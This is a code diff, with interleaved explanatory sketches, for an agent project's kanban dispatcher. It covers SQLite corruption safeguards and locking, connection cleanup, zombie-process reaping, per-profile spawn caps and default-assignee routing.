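def try_lock_nonblocking(lock_path: Path) -> bool:
    """Return True if the lock could be taken right now, without waiting."""
    with lock_path.open("a+b") as probe:
        try:
            fcntl.flock(probe.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
        except BlockingIOError:
            return False
        fcntl.flock(probe.fileno(), fcntl.LOCK_UN)
        return True


with tempfile.TemporaryDirectory() as tmp:
    db = Path(tmp) / "kanban.db"
    with sidecar_lock(db) as held_path:
        blocked_while_held = not try_lock_nonblocking(held_path)
    free_after_release = try_lock_nonblocking(held_path)
```

The lock file carries no payload; only the lock on it matters, which is why the file can be left behind after use.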
def _looks_like_tls_record_at(data: bytes, offset: int) -> bool:
@@ -1027,14 +1139,21 @@ class KanbanDbCorruptError(RuntimeError):
def _backup_corrupt_db(path: Path) -> Optional[Path]:
"""Copy a corrupt DB (and its WAL/SHM sidecars) to a timestamped backup.
"""Copy a corrupt DB (and its WAL/SHM sidecars) to a content-addressed backup.
The backup filename is deterministic in the main DB's sha256, so repeated
quarantines of the same corrupt bytes (gateway restarts, dispatcher retries,
multi-profile fleets all hitting the same shared DB) reuse one backup
instead of amplifying disk usage by N. If the corrupt bytes actually
change between attempts (e.g. a partial repair or further damage), the
fingerprint changes and a separate backup is preserved.
Returns the backup path of the main DB file, or ``None`` if the copy
itself failed (the caller still raises loudly in that case).
Writes are confined to the original DB's parent directory. The
backup basename is derived purely from ``path.name``, never from
caller-supplied directory segments, so no traversal is possible.
Writes are confined to the original DB's parent directory. The backup
basename is derived purely from ``path.name`` and a content hash, never
from caller-supplied directory segments, so no traversal is possible.
"""
# Resolve once and pin the parent so subsequent path operations cannot
# escape it. ``Path.resolve()`` collapses any ``..`` segments and
@@ -1042,32 +1161,31 @@ def _backup_corrupt_db(path: Path) -> Optional[Path]:
resolved = path.resolve()
parent = resolved.parent
base_name = resolved.name # basename only
stamp = datetime.now().strftime("%Y%m%d_%H%M%S")
candidate = parent / f"{base_name}.corrupt.{stamp}.bak"
# Defensive: candidate must still be inside parent after construction.
# f-string interpolation of ``base_name`` cannot escape ``parent``
# because ``base_name`` is itself a resolved basename, but assert it
# anyway so static analyzers can see the containment guarantee.
if candidate.parent != parent:
return None
counter = 0
while candidate.exists():
counter += 1
candidate = parent / f"{base_name}.corrupt.{stamp}.{counter}.bak"
if candidate.parent != parent:
return None
digest = hashlib.sha256()
try:
shutil.copy2(resolved, candidate)
with resolved.open("rb") as handle:
for chunk in iter(lambda: handle.read(1024 * 1024), b""):
digest.update(chunk)
except OSError:
return None
token = digest.hexdigest()[:16]
candidate = parent / f"{base_name}.corrupt.{token}.bak"
# Defensive: candidate must still be inside parent after construction.
if candidate.parent != parent:
return None
if not candidate.exists():
try:
shutil.copy2(resolved, candidate)
except OSError:
return None
for suffix in ("-wal", "-shm"):
sidecar = parent / (base_name + suffix)
if sidecar.parent != parent or not sidecar.exists():
continue
sidecar_backup = parent / (candidate.name + suffix)
if sidecar_backup.parent != parent or sidecar_backup.exists():
continue
try:
sidecar_backup = parent / (candidate.name + suffix)
if sidecar_backup.parent != parent:
continue
shutil.copy2(sidecar, sidecar_backup)
except OSError:
pass
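The content-addressed naming used by the new backup path can be sketched separately from the copy logic. This is an illustrative helper under the same scheme (chunked SHA-256, first 16 hex characters); the function name `content_addressed_backup_name` is hypothetical.

```python
import hashlib
import tempfile
from pathlib import Path


def content_addressed_backup_name(path: Path, chunk_size: int = 1024 * 1024) -> str:
    """Derive a deterministic backup basename from the file's bytes."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        # Read in fixed-size chunks so large files are never loaded whole.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    token = digest.hexdigest()[:16]
    return f"{path.name}.corrupt.{token}.bak"


with tempfile.TemporaryDirectory() as tmp:
    db = Path(tmp) / "kanban.db"
    db.write_bytes(b"not a sqlite file")
    first = content_addressed_backup_name(db)
    second = content_addressed_backup_name(db)   # same bytes, same name
    db.write_bytes(b"different damage")
    third = content_addressed_backup_name(db)    # changed bytes, new name
```

Because the name depends only on the basename and the bytes, repeated quarantines of an unchanged file resolve to the same backup path.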
@@ -1114,7 +1232,7 @@ def _guard_existing_db_is_healthy(path: Path) -> None:
return
reason: Optional[str] = None
try:
probe = sqlite3.connect(str(resolved), timeout=5, isolation_level=None)
probe = _sqlite_connect(resolved)
try:
row = probe.execute("PRAGMA integrity_check").fetchone()
finally:
@@ -1160,45 +1278,90 @@ def connect(
else:
path = kanban_db_path(board=board)
path.parent.mkdir(parents=True, exist_ok=True)
# Cheap byte-level check first — catches the #29507 TLS-overwrite shape
# and other invalid-header cases without opening a sqlite connection.
_validate_sqlite_header(path)
# Full integrity probe — catches corruption past the header (malformed
# pages, broken internal metadata). Cached per-path after first success
# via _INITIALIZED_PATHS so it only runs once per process per path.
_guard_existing_db_is_healthy(path)
resolved = str(path.resolve())
conn = sqlite3.connect(str(path), isolation_level=None, timeout=30)
try:
conn.row_factory = sqlite3.Row
with _INIT_LOCK:
# WAL activation can take an exclusive lock while SQLite creates the
# sidecar files for a fresh database. Keep it in the same process-local
# critical section as schema initialization so concurrent gateway
# startup threads do not race before _INITIALIZED_PATHS is populated.
# WAL doesn't work on network filesystems (NFS/SMB/FUSE). Shared helper
# falls back to DELETE with one WARNING so kanban stays usable there.
# See hermes_state._WAL_INCOMPAT_MARKERS for detection logic.
from hermes_state import apply_wal_with_fallback
apply_wal_with_fallback(conn, db_label=f"kanban.db ({path.name})")
conn.execute("PRAGMA synchronous=NORMAL")
conn.execute("PRAGMA foreign_keys=ON")
needs_init = resolved not in _INITIALIZED_PATHS
if needs_init:
# Idempotent: runs CREATE TABLE IF NOT EXISTS + the additive
# migrations. Cached so subsequent connect() calls in the same
# process are cheap. The lock prevents same-process dispatcher
# threads from racing through the additive ALTER TABLE pass with
# stale PRAGMA snapshots during gateway startup.
conn.executescript(SCHEMA_SQL)
_migrate_add_optional_columns(conn)
_INITIALIZED_PATHS.add(resolved)
except Exception:
conn.close()
raise
with _cross_process_init_lock(path):
# Cheap byte-level check first — catches the #29507 TLS-overwrite shape
# and other invalid-header cases without opening a sqlite connection.
_validate_sqlite_header(path)
# Full integrity probe — catches corruption past the header (malformed
# pages, broken internal metadata). Cached per-path after first success
# via _INITIALIZED_PATHS so it only runs once per process per path.
_guard_existing_db_is_healthy(path)
resolved = str(path.resolve())
conn = _sqlite_connect(path)
try:
conn.row_factory = sqlite3.Row
with _INIT_LOCK:
# WAL activation can take an exclusive lock while SQLite creates the
# sidecar files for a fresh database. Keep it in the same process-local
# critical section as schema initialization so concurrent gateway
# startup threads do not race before _INITIALIZED_PATHS is populated.
# WAL doesn't work on network filesystems (NFS/SMB/FUSE). Shared helper
# falls back to DELETE with one WARNING so kanban stays usable there.
# See hermes_state._WAL_INCOMPAT_MARKERS for detection logic.
from hermes_state import apply_wal_with_fallback
apply_wal_with_fallback(conn, db_label=f"kanban.db ({path.name})")
# FULL (was NORMAL): fsync before each checkpoint to narrow the
# crash window that can leave a b-tree page header torn.
conn.execute("PRAGMA synchronous=FULL")
conn.execute("PRAGMA wal_autocheckpoint=100")
conn.execute("PRAGMA foreign_keys=ON")
# Zero freed pages so a later torn write cannot expose stale
# cell content; persisted in the DB header for new DBs.
conn.execute("PRAGMA secure_delete=ON")
# Surface corrupt cells as read errors instead of silent
# wrong-data returns.
conn.execute("PRAGMA cell_size_check=ON")
needs_init = resolved not in _INITIALIZED_PATHS
if needs_init:
# Idempotent: runs CREATE TABLE IF NOT EXISTS + the additive
# migrations. Cached so subsequent connect() calls in the same
# process are cheap. The lock prevents same-process dispatcher
# threads from racing through the additive ALTER TABLE pass with
# stale PRAGMA snapshots during gateway startup.
conn.executescript(SCHEMA_SQL)
_migrate_add_optional_columns(conn)
_INITIALIZED_PATHS.add(resolved)
except Exception:
conn.close()
raise
return conn
@contextlib.contextmanager
def connect_closing(
db_path: Optional[Path] = None,
*,
board: Optional[str] = None,
):
"""Open a kanban DB connection and guarantee it is closed on exit.
Use this instead of ``with kb.connect() as conn:`` because sqlite3's
built-in connection context manager only commits or rolls back the
transaction; it does NOT close the file descriptor. In long-lived
processes (gateway, dashboard) that route every kanban operation
through ``connect()`` (e.g. ``run_slash`` dispatching ``/kanban ``
commands, ``decompose_task_endpoint`` calling
``kanban_decompose.decompose_task``), the unclosed connections
accumulate as open FDs to ``kanban.db`` and ``kanban.db-wal``. After
enough operations the process hits the kernel FD limit and dies
with ``[Errno 24] Too many open files``.
See #33159 for the production incident.
The ``connect()`` function itself remains unchanged so callers that
intentionally manage the connection lifetime (tests, long-lived
callers) continue to work.
"""
conn = connect(db_path=db_path, board=board)
try:
yield conn
finally:
try:
conn.close()
except Exception:
pass
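The behaviour that motivates `connect_closing` is easy to reproduce with the standard library alone. The sketch below uses `contextlib.closing` as a stand-in for the helper (it is not the helper itself) and a hypothetical `still_open` probe to show the difference.

```python
import contextlib
import sqlite3


def still_open(conn: sqlite3.Connection) -> bool:
    """Return True if the connection still accepts statements."""
    try:
        conn.execute("SELECT 1")
        return True
    except sqlite3.ProgrammingError:
        # Raised when operating on a closed connection.
        return False


# sqlite3's own context manager only commits or rolls back.
conn_a = sqlite3.connect(":memory:")
with conn_a:
    conn_a.execute("CREATE TABLE t (x)")
open_after_with = still_open(conn_a)      # the connection is still open here
conn_a.close()

# A closing wrapper releases the connection on exit.
with contextlib.closing(sqlite3.connect(":memory:")) as conn_b:
    conn_b.execute("SELECT 1")
open_after_closing = still_open(conn_b)   # the connection is closed here
```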
def init_db(
db_path: Optional[Path] = None,
*,
@@ -1466,6 +1629,45 @@ def _migrate_add_optional_columns(conn: sqlite3.Connection) -> None:
)
def _check_file_length_invariant(conn: sqlite3.Connection) -> None:
"""Read the SQLite header page_count and compare against actual file size.
Raises sqlite3.DatabaseError if the file is shorter than the header claims
(torn-extend corruption).
"""
try:
row = conn.execute("PRAGMA database_list").fetchone()
if row is None:
return
path_str = row[2] # column 2 is the file path; empty for in-memory DBs
if not path_str:
return # in-memory or unnamed DB; skip
path = path_str
page_size = conn.execute("PRAGMA page_size").fetchone()[0]
file_size = os.path.getsize(path)
with open(path, "rb") as f:
f.seek(28)
header_bytes = f.read(4)
if len(header_bytes) < 4:
return # can't read header; skip
header_page_count = int.from_bytes(header_bytes, "big")
if header_page_count == 0:
return # new/empty DB; skip
actual_pages = file_size // page_size
if actual_pages < header_page_count:
raise sqlite3.DatabaseError(
f"torn-extend detected: page count mismatch on {path}: "
f"header claims {header_page_count} pages, "
f"file has {actual_pages} pages "
f"(missing {header_page_count - actual_pages} pages, "
f"file_size={file_size}, page_size={page_size})"
)
except sqlite3.DatabaseError:
raise
except Exception:
pass # I/O errors during check are non-fatal; let normal ops continue
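The header comparison above relies on two fields of the SQLite file header: the page size (2 bytes at offset 16, where the value 1 means 65536) and the in-header page count (4 bytes at offset 28), both big-endian. The following standalone sketch reads both from the file instead of using PRAGMAs; `header_vs_file_pages` is a hypothetical name, and the truncation only simulates a short file.

```python
import os
import sqlite3
import tempfile


def header_vs_file_pages(path: str) -> tuple[int, int]:
    """Return (page count claimed by the header, pages present on disk)."""
    with open(path, "rb") as f:
        header = f.read(100)
    page_size = int.from_bytes(header[16:18], "big")
    if page_size == 1:          # special encoding for 65536-byte pages
        page_size = 65536
    header_pages = int.from_bytes(header[28:32], "big")
    actual_pages = os.path.getsize(path) // page_size
    return header_pages, actual_pages


with tempfile.TemporaryDirectory() as tmp:
    db_path = os.path.join(tmp, "demo.db")
    conn = sqlite3.connect(db_path)
    conn.execute("CREATE TABLE t (x)")
    conn.commit()
    conn.close()
    healthy = header_vs_file_pages(db_path)

    # Simulate a file that is shorter than its header claims.
    with open(db_path, "r+b") as f:
        f.truncate(os.path.getsize(db_path) // 2)
    torn = header_vs_file_pages(db_path)
```

In the healthy case both numbers agree; after truncation the header still claims the original page count while fewer pages exist on disk.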
@contextlib.contextmanager
def write_txn(conn: sqlite3.Connection):
"""Context manager for an IMMEDIATE write transaction.
@@ -1473,15 +1675,28 @@ def write_txn(conn: sqlite3.Connection):
Use for any multi-statement write (creating a task + link, claiming a
task + recording an event, etc.). A claim CAS inside this context is
atomic -- at most one concurrent writer can succeed.
The explicit ROLLBACK on exception is wrapped in try/except so that
a SQLite auto-rollback (which leaves no active transaction) does not
shadow the original exception with a spurious rollback error.
"""
conn.execute("BEGIN IMMEDIATE")
try:
yield conn
except Exception:
conn.execute("ROLLBACK")
try:
conn.execute("ROLLBACK")
except sqlite3.OperationalError:
# SQLite has already auto-rolled-back the transaction (typical
# under EIO, lock contention, or corruption). Nothing to undo;
# do not let this secondary failure shadow the real one.
pass
raise
else:
conn.execute("COMMIT")
# Post-commit file-length check: header page_count must match actual file pages.
# A discrepancy means a torn-extend — raise now rather than silently corrupt.
_check_file_length_invariant(conn)
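A reduced version of the transaction wrapper, without the post-commit file check, shows the commit and rollback paths. This is a sketch under the same autocommit setup (`isolation_level=None`); `immediate_txn` is a hypothetical name and the table is made up for the example.

```python
import contextlib
import sqlite3


@contextlib.contextmanager
def immediate_txn(conn: sqlite3.Connection):
    """BEGIN IMMEDIATE, then COMMIT on success or ROLLBACK on error."""
    conn.execute("BEGIN IMMEDIATE")
    try:
        yield conn
    except Exception:
        try:
            conn.execute("ROLLBACK")
        except sqlite3.OperationalError:
            # SQLite may already have rolled back; keep the original error.
            pass
        raise
    else:
        conn.execute("COMMIT")


conn = sqlite3.connect(":memory:", isolation_level=None)
conn.execute("CREATE TABLE tasks (id TEXT PRIMARY KEY, status TEXT)")

with immediate_txn(conn):
    conn.execute("INSERT INTO tasks VALUES ('t1', 'ready')")

try:
    with immediate_txn(conn):
        conn.execute("INSERT INTO tasks VALUES ('t2', 'ready')")
        raise RuntimeError("simulated failure")
except RuntimeError:
    pass

ids = [row[0] for row in conn.execute("SELECT id FROM tasks ORDER BY id")]
conn.close()
```

Only the first insert survives, since the second transaction is rolled back before the exception propagates.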
# ---------------------------------------------------------------------------
@@ -4074,6 +4289,12 @@ class DispatchResult:
skipped_unassigned: list[str] = field(default_factory=list)
"""Ready task ids skipped because they have no assignee at all.
Operator-actionable: usually a misfiled task waiting for routing."""
auto_assigned_default: list[str] = field(default_factory=list)
"""Task ids that were unassigned in the DB and had
``kanban.default_assignee`` applied this tick before spawning (#27145).
Surfaces the auto-assignment to telemetry / CLI / dashboard so the
operator can see when the dispatcher is acting on the fallback rule
rather than on explicit per-task assignments."""
skipped_nonspawnable: list[str] = field(default_factory=list)
"""Ready task ids skipped because their assignee names a control-plane
lane (a Claude Code terminal like ``orion-cc``) rather than a Hermes
@@ -4081,6 +4302,14 @@ class DispatchResult:
operator-actionable failure. Tracked separately so health telemetry
can distinguish "real stuck" (nothing spawned but spawnable work
available) from "correctly idle" (nothing spawnable in the queue)."""
skipped_per_profile_capped: list[tuple[str, str, int]] = field(default_factory=list)
"""Tasks deferred this tick because their assignee is already at
``kanban.max_in_progress_per_profile`` (#21582). Each entry is
``(task_id, assignee, current_running_count)``. NOT an
operator-actionable failure; the task will be picked up on a
subsequent tick when the assignee has capacity. Separate bucket so
telemetry / dashboards can show "this profile is busy" vs
"task is genuinely stuck"."""
crashed: list[str] = field(default_factory=list)
"""Task ids reclaimed because their worker PID disappeared."""
auto_blocked: list[str] = field(default_factory=list)
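How the `skipped_per_profile_capped` bucket fills up during one tick can be sketched with plain data structures. This is a simplified model, not the dispatcher: `plan_spawns` is a hypothetical function, tasks are `(task_id, assignee)` pairs, and `running` stands for the per-assignee counts queried at tick start.

```python
from collections import Counter
from typing import Optional


def plan_spawns(
    ready: list[tuple[str, str]],
    running: dict[str, int],
    cap: Optional[int],
) -> tuple[list[tuple[str, str]], list[tuple[str, str, int]]]:
    """Split ready tasks into (to_spawn, capped) for a single tick."""
    counts = Counter(running)
    to_spawn: list[tuple[str, str]] = []
    capped: list[tuple[str, str, int]] = []
    for task_id, assignee in ready:
        current = counts[assignee]
        if cap is not None and current >= cap:
            # Deferred, not failed: retried on a later tick.
            capped.append((task_id, assignee, current))
            continue
        to_spawn.append((task_id, assignee))
        counts[assignee] += 1   # later tasks in this tick see the new count
    return to_spawn, capped


ready = [("a", "alice"), ("b", "alice"), ("c", "bob"), ("d", "alice")]
to_spawn, capped = plan_spawns(ready, running={"alice": 1}, cap=2)
```

With one `alice` task already running and a cap of 2, only task `a` fits for `alice`, while `bob` is unaffected.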
@@ -4169,6 +4398,29 @@ def _classify_worker_exit(pid: int) -> "tuple[str, Optional[int]]":
return ("unknown", None)
def reap_worker_zombies() -> "list[int]":
"""Reap all zombie children of this process without blocking.
Returns the list of reaped PIDs. Safe to call when there are no
children (returns []). No-op on Windows.
"""
reaped: "list[int]" = []
if os.name != "nt":
try:
while True:
try:
pid, status = os.waitpid(-1, os.WNOHANG)
except ChildProcessError:
break
if pid == 0:
break
_record_worker_exit(pid, status)
reaped.append(pid)
except Exception:
pass
return reaped
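The non-blocking reap loop can be exercised on its own. The sketch below omits the exit-status recording done by `_record_worker_exit`; `reap_children_nonblocking` and `spawn_and_reap` are hypothetical names, and the demo only applies on POSIX systems.

```python
import os
import subprocess
import sys
import time


def reap_children_nonblocking() -> list[int]:
    """Collect every already-exited child without waiting for live ones."""
    reaped: list[int] = []
    if os.name == "nt":
        return reaped            # no zombies to reap on Windows
    while True:
        try:
            pid, _status = os.waitpid(-1, os.WNOHANG)
        except ChildProcessError:
            break                # no children at all
        if pid == 0:
            break                # children exist, none has exited yet
        reaped.append(pid)
    return reaped


def spawn_and_reap(timeout_seconds: float = 10.0) -> bool:
    """Spawn a short-lived child and poll until the reaper collects it."""
    if os.name == "nt":
        return True
    child = subprocess.Popen([sys.executable, "-c", "pass"])
    deadline = time.monotonic() + timeout_seconds
    while time.monotonic() < deadline:
        if child.pid in reap_children_nonblocking():
            return True
        time.sleep(0.05)
    return False
```

Note that `waitpid(-1, ...)` reaps any child of the process, so this pattern suits a parent that does not otherwise wait on its `Popen` handles.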
def _pid_alive(pid: Optional[int]) -> bool:
"""Return True if ``pid`` is still running on this host.
@@ -4635,7 +4887,7 @@ def detect_crashed_workers(conn: sqlite3.Connection) -> list[str]:
# (task_id, pid, claimer, protocol_violation, error_text)
with write_txn(conn):
rows = conn.execute(
"SELECT id, worker_pid, claim_lock FROM tasks "
"SELECT id, worker_pid, claim_lock, started_at FROM tasks "
"WHERE status = 'running' AND worker_pid IS NOT NULL"
).fetchall()
host_prefix = f"{_claimer_id().split(':', 1)[0]}:"
@@ -4644,6 +4896,14 @@ def detect_crashed_workers(conn: sqlite3.Connection) -> list[str]:
lock = row["claim_lock"] or ""
if not lock.startswith(host_prefix):
continue
# Skip liveness check inside the launch-window grace period
# so a freshly-spawned worker isn't reclaimed before its PID
# is visible on /proc.
started_at = row["started_at"] if "started_at" in row.keys() else None
if started_at is not None:
grace = _resolve_crash_grace_seconds()
if time.time() - started_at < grace:
continue
if _pid_alive(row["worker_pid"]):
continue
@@ -5096,6 +5356,8 @@ def dispatch_once(
failure_limit: int = DEFAULT_SPAWN_FAILURE_LIMIT,
stale_timeout_seconds: int = 0,
board: Optional[str] = None,
default_assignee: Optional[str] = None,
max_in_progress_per_profile: Optional[int] = None,
) -> DispatchResult:
"""Run one dispatcher tick.
@@ -5125,38 +5387,9 @@ def dispatch_once(
``board`` pins workspace/log/db resolution for this tick to a specific
board. When omitted, the current-board resolution chain is used.
"""
# Reap zombie children from previously spawned workers.
# The gateway-embedded dispatcher is the parent of every worker spawned
# via _default_spawn (start_new_session=True only detaches the
# controlling tty, not the parent). Without an explicit waitpid, each
# completed worker becomes a <defunct> entry that lingers until gateway
# exit. WNOHANG keeps this non-blocking; ChildProcessError means no
# children to reap. Bounded: at most one tick's worth of completions
# can be in <defunct> at once.
#
# We also record the exit status keyed by pid, so
# ``detect_crashed_workers`` can distinguish a worker that exited
# cleanly without calling ``kanban_complete`` / ``kanban_block``
# (protocol violation — auto-block) from a real crash (OOM killer,
# SIGKILL, non-zero exit — existing counter behavior).
#
# Windows has no zombies / no os.WNOHANG — subprocess.Popen handles
# are freed when the Python object is garbage-collected or .wait() is
# called explicitly. The kanban dispatcher discards the Popen handle
# after spawn (``_default_spawn`` → abandon), so on Windows there's
# nothing to reap here — skip the whole block.
if os.name != "nt":
try:
while True:
try:
_pid, _status = os.waitpid(-1, os.WNOHANG)
except ChildProcessError:
break
if _pid == 0:
break
_record_worker_exit(_pid, _status)
except Exception:
pass
# Reap zombie children from previously spawned workers. See
# reap_worker_zombies() for the full rationale.
reap_worker_zombies()
result = DispatchResult()
result.reclaimed = release_stale_claims(conn)
@@ -5210,12 +5443,89 @@ def dispatch_once(
if max_spawn is None or max_spawn > remaining:
max_spawn = remaining
spawned = 0
# Per-profile concurrency cap (#21582): when set, track how many
# workers each assignee already has in flight, and refuse to spawn
# when this would push that assignee past the cap. Prevents
# fan-out workloads from melting a single profile's local model /
# API quota / browser pool while leaving other profiles idle.
# Tasks blocked this way go to skipped_per_profile_capped (not
# skipped_unassigned — the operator-actionable signal is different:
# "this profile is busy, try again later" not "this needs routing").
_per_profile_cap = max_in_progress_per_profile if (
isinstance(max_in_progress_per_profile, int)
and max_in_progress_per_profile > 0
) else None
_per_profile_running: dict[str, int] = {}
if _per_profile_cap is not None:
for prow in conn.execute(
"SELECT assignee, COUNT(*) AS n FROM tasks "
"WHERE status = 'running' AND assignee IS NOT NULL "
"GROUP BY assignee"
):
_per_profile_running[prow["assignee"]] = int(prow["n"])
# Normalize default_assignee once: empty/whitespace string → None so the
# rest of the loop can use ``if default_assignee:`` as a single check.
# We also resolve profile_exists once here for the same reason.
_default_assignee = (default_assignee or "").strip() or None
_default_assignee_resolved = False
if _default_assignee:
try:
from hermes_cli.profiles import profile_exists as _pe
_default_assignee_resolved = bool(_pe(_default_assignee))
except Exception:
# Profiles module not importable (test stubs, exotic envs).
# Trust the operator's config and try the assignment; the
# downstream profile_exists check on the assigned row will
# bucket it as nonspawnable if the profile genuinely isn't
# there, with the existing diagnostic.
_default_assignee_resolved = True
for row in ready_rows:
if max_spawn is not None and running_count + spawned >= max_spawn:
break
if not row["assignee"]:
result.skipped_unassigned.append(row["id"])
continue
row_assignee = row["assignee"]
if not row_assignee:
# Honour kanban.default_assignee: when the dispatcher hits an
# unassigned ready task and an operator-configured fallback
# exists, persist the assignment and proceed. This removes the
# dashboard footgun where a task created without an assignee
# parks in 'ready' forever even though the operator's intent
# ("default") was perfectly clear (#27145). Mutating the row
# (not just the in-memory view) keeps diagnostics and the
# board state consistent: the task is now legitimately owned
# by ``kanban.default_assignee``, not "unassigned but secretly
# routed".
if _default_assignee and _default_assignee_resolved:
# Dry-run: show what WOULD happen (auto-assign + spawn) without
# mutating the DB. Real run: mutate the row + emit the
# 'assigned' event so the board state matches what just happened.
if not dry_run:
try:
with write_txn(conn):
conn.execute(
"UPDATE tasks SET assignee = ? WHERE id = ? "
"AND (assignee IS NULL OR assignee = '')",
(_default_assignee, row["id"]),
)
_append_event(
conn, row["id"], "assigned",
{
"assignee": _default_assignee,
"source": "kanban.default_assignee",
},
)
except Exception:
_log.debug(
"kanban dispatch: failed to apply default_assignee=%r "
"to task %s",
_default_assignee, row["id"], exc_info=True,
)
result.skipped_unassigned.append(row["id"])
continue
row_assignee = _default_assignee
result.auto_assigned_default.append(row["id"])
else:
result.skipped_unassigned.append(row["id"])
continue
# Skip ready tasks whose assignee is not a real Hermes profile.
# `_default_spawn` invokes ``hermes -p <assignee>`` which fails
# with "Profile 'X' does not exist" when the assignee names a
@@ -5230,7 +5540,7 @@ def dispatch_once(
from hermes_cli.profiles import profile_exists # local import: avoids cycle
except Exception:
profile_exists = None # type: ignore[assignment]
if profile_exists is not None and not profile_exists(row["assignee"]):
if profile_exists is not None and not profile_exists(row_assignee):
# Bucket separately from skipped_unassigned: the operator
# cannot fix this by assigning a profile (the assignee IS the
# intended owner — a terminal lane). Health telemetry uses
@@ -5239,6 +5549,19 @@ def dispatch_once(
# of human-pulled work.
result.skipped_nonspawnable.append(row["id"])
continue
# Per-profile concurrency cap (#21582): even if there's global
# headroom, refuse to spawn for an assignee that's already at
# its in-flight cap. Prevents one profile's local model / API
# quota / browser pool from being overwhelmed by a fan-out
# while the global max_in_progress / max_spawn caps still allow
# work on OTHER profiles.
if _per_profile_cap is not None:
current = _per_profile_running.get(row_assignee, 0)
if current >= _per_profile_cap:
result.skipped_per_profile_capped.append(
(row["id"], row_assignee, current)
)
continue
# Respawn guard: refuse to re-spawn when useful work is already
# in-flight/recent, or when the last failure is a deterministic
# blocker (quota / auth). The guard defers the spawn this tick so
@@ -5261,7 +5584,15 @@ def dispatch_once(
)
continue
if dry_run:
result.spawned.append((row["id"], row["assignee"], ""))
result.spawned.append((row["id"], row_assignee, ""))
# Increment per-profile counter even in dry_run so the cap
# check sees the would-be spawn on subsequent iterations.
# Without this, dry_run reports every task as spawnable and
# under-reports the capped subset (#21582).
if _per_profile_cap is not None and row_assignee:
_per_profile_running[row_assignee] = (
_per_profile_running.get(row_assignee, 0) + 1
)
continue
claimed = claim_task(conn, row["id"], ttl_seconds=ttl_seconds)
if claimed is None:
@@ -5304,6 +5635,13 @@ def dispatch_once(
# complete_task).
result.spawned.append((claimed.id, claimed.assignee or "", str(workspace)))
spawned += 1
# Track the new in-flight count for this profile so later
# iterations in this same tick respect the per-profile cap
# (#21582). Subsequent ticks re-query from the DB.
if _per_profile_cap is not None and claimed.assignee:
_per_profile_running[claimed.assignee] = (
_per_profile_running.get(claimed.assignee, 0) + 1
)
except Exception as exc:
auto = _record_spawn_failure(
conn, claimed.id, str(exc),
+4 -4
@@ -281,7 +281,7 @@ def decompose_task(
configured, API error, malformed response, decomposer returned
fanout=true with empty task list); those surface via ``ok=False``.
"""
with kb.connect() as conn:
with kb.connect_closing() as conn:
task = kb.get_task(conn, task_id)
if task is None:
return DecomposeOutcome(task_id, False, "unknown task id")
@@ -370,7 +370,7 @@ def decompose_task(
return DecomposeOutcome(
task_id, False, "decomposer returned fanout=false with no title/body",
)
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.specify_triage_task(
conn,
task_id,
@@ -439,7 +439,7 @@ def decompose_task(
})
try:
with kb.connect() as conn:
with kb.connect_closing() as conn:
child_ids = kb.decompose_triage_task(
conn,
task_id,
@@ -467,7 +467,7 @@ def decompose_task(
def list_triage_ids(*, tenant: Optional[str] = None) -> list[str]:
"""Return task ids currently in the triage column."""
with kb.connect() as conn:
with kb.connect_closing() as conn:
rows = kb.list_tasks(
conn,
status="triage",
+3 -3
@@ -150,7 +150,7 @@ def specify_task(
error, malformed response); those surface via ``ok=False`` so the
``--all`` sweep can continue past individual failures.
"""
with kb.connect() as conn:
with kb.connect_closing() as conn:
task = kb.get_task(conn, task_id)
if task is None:
return SpecifyOutcome(task_id, False, "unknown task id")
@@ -239,7 +239,7 @@ def specify_task(
task_id, False, "LLM response missing title and body"
)
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.specify_triage_task(
conn,
task_id,
@@ -261,7 +261,7 @@ def list_triage_ids(*, tenant: Optional[str] = None) -> list[str]:
``tenant`` narrows the sweep; ``None`` returns every triage task.
"""
with kb.connect() as conn:
with kb.connect_closing() as conn:
tasks = kb.list_tasks(
conn,
status="triage",
+458 -130
@@ -65,6 +65,39 @@ import os
import sys
# Mouse-tracking residue suppression — runs BEFORE every other import on the
# TUI hot path so the terminal stops emitting SGR/X10 mouse reports while the
# Python launcher is still doing imports (≈100-300ms in cooked + echo mode,
# before the Node TUI takes stdin into raw mode). During that window any
# incoming bytes are echoed straight back to the user's shell scrollback as
# ``^[[<…M`` text. The TUI itself runs `resetTerminalModes()` again in
# `entry.tsx`; this is just the earlier cousin. ``HERMES_TUI_NO_EARLY_DISABLE``
# escapes the behaviour for diagnostics.
def _suppress_mouse_residue_early() -> None:
if os.environ.get("HERMES_TUI_NO_EARLY_DISABLE") == "1":
return
if not (os.environ.get("HERMES_TUI") == "1" or "--tui" in sys.argv[1:]):
return
try:
# Skip when stdout is redirected (`hermes --tui … >log`, CI capture):
# the bytes can't reach the terminal anyway and would just pollute
# the log with raw CSI.
if not os.isatty(1):
return
# Disable every mouse-tracking variant we know about. Idempotent and
# safe to send even when no tracking is currently asserted.
os.write(
1,
b"\x1b[?1003l\x1b[?1002l\x1b[?1001l\x1b[?1000l\x1b[?9l"
b"\x1b[?1006l\x1b[?1005l\x1b[?1015l\x1b[?1016l\x1b[?2029l",
)
except OSError:
pass
_suppress_mouse_residue_early()
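The gating logic of the early mouse-tracking reset can be separated from the terminal write so that it is testable. This is a sketch: `should_suppress` and `suppress_if_needed` are hypothetical names, and `MOUSE_OFF` lists only a subset of the DEC private-mode resets sent by the real function.

```python
import os
import sys
from typing import Mapping, Sequence

# Subset of the mouse-tracking resets, for illustration.
MOUSE_OFF = b"\x1b[?1003l\x1b[?1002l\x1b[?1000l\x1b[?1006l"


def should_suppress(
    env: Mapping[str, str], argv: Sequence[str], stdout_is_tty: bool
) -> bool:
    """Decide whether the reset bytes should be written at startup."""
    if env.get("HERMES_TUI_NO_EARLY_DISABLE") == "1":
        return False             # diagnostic escape hatch
    if not (env.get("HERMES_TUI") == "1" or "--tui" in argv[1:]):
        return False             # not a TUI launch
    return stdout_is_tty         # redirected output would only be polluted


def suppress_if_needed() -> bool:
    """Write the reset sequence to fd 1 when the predicate allows it."""
    if not should_suppress(os.environ, sys.argv, os.isatty(1)):
        return False
    try:
        os.write(1, MOUSE_OFF)
    except OSError:
        return False
    return True
```

Keeping the decision in a pure function means the environment, arguments and TTY state can be varied in tests without touching a real terminal.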
def _is_termux_startup_environment_fast() -> bool:
"""Tiny Termux check for pre-import startup shortcuts."""
prefix = os.environ.get("PREFIX", "")
